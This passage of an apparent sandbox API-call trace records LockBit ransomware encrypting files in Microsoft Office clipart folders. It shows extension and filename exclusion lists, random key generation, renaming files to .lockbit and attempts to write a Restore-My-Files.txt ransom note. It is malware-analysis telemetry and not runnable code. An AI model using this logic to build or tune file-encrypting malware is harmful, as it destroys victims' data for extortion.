NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0139.228] malloc (_Size=0xa6) returned 0x77d7a8 [0139.228] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0139.230] free (_Block=0x77d7a8) [0139.230] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0139.230] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0139.230] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0139.230] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5636ddf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x864, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0106572.WMF", cAlternateFileName="")) returned 1 [0139.230] lstrcmpiW (lpString1=".", lpString2="J0106572.WMF") returned -1 [0139.230] lstrcmpiW (lpString1="..", lpString2="J0106572.WMF") returned -1 [0139.230] PathFindExtensionW (pszPath="J0106572.WMF") returned=".WMF" [0139.230] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0139.230] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0139.230] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0139.230] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0139.230] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0139.230] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0139.230] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0139.230] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0139.230] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0139.230] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0139.230] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0139.230] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0139.230] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0139.230] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0139.231] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0139.231] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0139.231] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0139.231] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0139.231] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0139.231] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0139.231] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0139.231] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0139.231] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0139.231] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0139.231] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.231] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0139.231] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0139.231] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0139.231] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0139.231] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0139.231] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0139.231] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0139.231] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0139.231] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0139.231] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0139.231] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0139.231] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0139.231] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0139.231] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0139.231] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0139.231] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0139.231] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0139.231] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.231] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0139.231] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0139.231] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0139.231] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0139.231] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0106572.WMF") returned 1 [0139.232] lstrcmpiW (lpString1="ntldr", lpString2="J0106572.WMF") returned 1 [0139.232] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0106572.WMF") returned 1 [0139.232] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0106572.WMF") returned -1 [0139.232] lstrcmpiW (lpString1="autorun.inf", lpString2="J0106572.WMF") returned -1 [0139.232] lstrcmpiW (lpString1="thumbs.db", lpString2="J0106572.WMF") returned 1 [0139.232] lstrcmpiW (lpString1="iconcache.db", lpString2="J0106572.WMF") returned -1 [0139.232] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0139.232] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF") returned=".WMF" [0139.232] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0139.232] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0139.232] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0139.232] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0139.232] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0139.232] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0139.232] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0139.232] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0139.232] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0139.232] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0139.232] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0139.232] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0139.232] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0139.232] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0139.232] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0139.232] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0139.232] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0139.232] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0139.232] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0139.232] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0139.232] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0139.232] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0139.232] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0139.232] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0139.232] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0139.232] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0139.232] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0139.233] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0139.233] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF.lockbit") returned 72 [0139.233] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106572.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0139.237] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0139.237] malloc (_Size=0x40068) returned 0x3df0008 [0139.237] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2148) returned 1 [0139.237] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.237] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.237] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0139.237] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.238] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.238] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0139.238] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0139.242] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0139.242] malloc (_Size=0xa6) returned 0x77d7a8 [0139.242] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0139.242] free (_Block=0x77d7a8) [0139.242] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0139.242] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0139.242] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0139.242] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e8eef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xd04, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0106816.WMF", cAlternateFileName="")) returned 1 [0139.242] lstrcmpiW (lpString1=".", lpString2="J0106816.WMF") returned -1 [0139.242] lstrcmpiW (lpString1="..", lpString2="J0106816.WMF") returned -1 [0139.242] PathFindExtensionW (pszPath="J0106816.WMF") returned=".WMF" [0139.242] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0139.242] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0139.242] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0139.242] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0139.242] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0139.242] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0139.242] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0139.242] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0139.242] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0139.242] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0139.243] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0139.243] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0139.243] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0139.243] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0139.243] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0139.243] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0139.243] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0139.243] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0139.243] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0139.243] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0139.243] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0139.243] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0139.243] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0139.243] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0139.243] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.243] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0139.243] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0139.243] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0139.243] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0139.243] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0139.243] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0139.243] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0139.243] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0139.243] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0139.243] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0139.243] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0139.243] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0139.243] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0139.243] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0139.243] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0139.243] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0139.243] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0139.243] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.244] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0139.244] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0139.244] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0139.244] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0139.244] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0106816.WMF") returned 1 [0139.244] lstrcmpiW (lpString1="ntldr", lpString2="J0106816.WMF") returned 1 [0139.244] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0106816.WMF") returned 1 [0139.244] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0106816.WMF") returned -1 [0139.244] lstrcmpiW (lpString1="autorun.inf", lpString2="J0106816.WMF") returned -1 [0139.244] lstrcmpiW (lpString1="thumbs.db", lpString2="J0106816.WMF") returned 1 [0139.244] lstrcmpiW (lpString1="iconcache.db", lpString2="J0106816.WMF") returned -1 [0139.244] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0139.244] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF") returned=".WMF" [0139.244] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0139.244] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0139.244] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0139.244] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0139.244] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0139.244] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0139.244] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0139.244] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0139.244] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0139.244] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0139.244] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0139.244] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0139.244] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0139.244] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0139.244] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0139.244] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0139.244] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0139.244] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0139.244] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0139.244] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0139.245] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0139.245] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0139.245] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0139.245] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0139.245] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0139.245] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0139.245] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0139.245] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0139.245] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF.lockbit") returned 72 [0139.245] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106816.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0139.246] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0139.246] malloc (_Size=0x40068) returned 0x3df0008 [0139.246] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3332) returned 1 [0139.246] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.246] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.246] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0139.246] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.246] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.246] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0139.247] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0139.250] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0139.250] malloc (_Size=0xa6) returned 0x77d7a8 [0139.250] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0139.251] free (_Block=0x77d7a8) [0139.251] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0139.251] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0139.251] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0139.251] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5636ddf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x35d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0106958.WMF", cAlternateFileName="")) returned 1 [0139.251] lstrcmpiW (lpString1=".", lpString2="J0106958.WMF") returned -1 [0139.251] lstrcmpiW (lpString1="..", lpString2="J0106958.WMF") returned -1 [0139.251] PathFindExtensionW (pszPath="J0106958.WMF") returned=".WMF" [0139.251] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0139.251] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0139.251] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0139.251] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0139.251] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0139.251] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0139.251] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0139.251] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0139.251] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0139.251] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0139.251] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0139.251] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0139.251] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0139.251] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0139.251] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0139.251] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0139.251] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0139.251] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0139.251] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0139.251] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0139.251] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0139.252] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0139.252] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0139.252] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0139.252] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.252] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0139.252] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0139.252] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0139.252] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0139.252] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0139.252] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0139.252] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0139.252] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0139.252] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0139.252] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0139.252] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0139.252] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0139.252] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0139.252] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0139.252] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0139.252] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0139.252] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0139.252] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.252] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0139.252] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0139.252] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0139.252] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0139.252] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0106958.WMF") returned 1 [0139.252] lstrcmpiW (lpString1="ntldr", lpString2="J0106958.WMF") returned 1 [0139.252] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0106958.WMF") returned 1 [0139.252] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0106958.WMF") returned -1 [0139.252] lstrcmpiW (lpString1="autorun.inf", lpString2="J0106958.WMF") returned -1 [0139.252] lstrcmpiW (lpString1="thumbs.db", lpString2="J0106958.WMF") returned 1 [0139.252] lstrcmpiW (lpString1="iconcache.db", lpString2="J0106958.WMF") returned -1 [0139.253] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0139.253] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF") returned=".WMF" [0139.253] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0139.253] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0139.253] lstrcmpiW 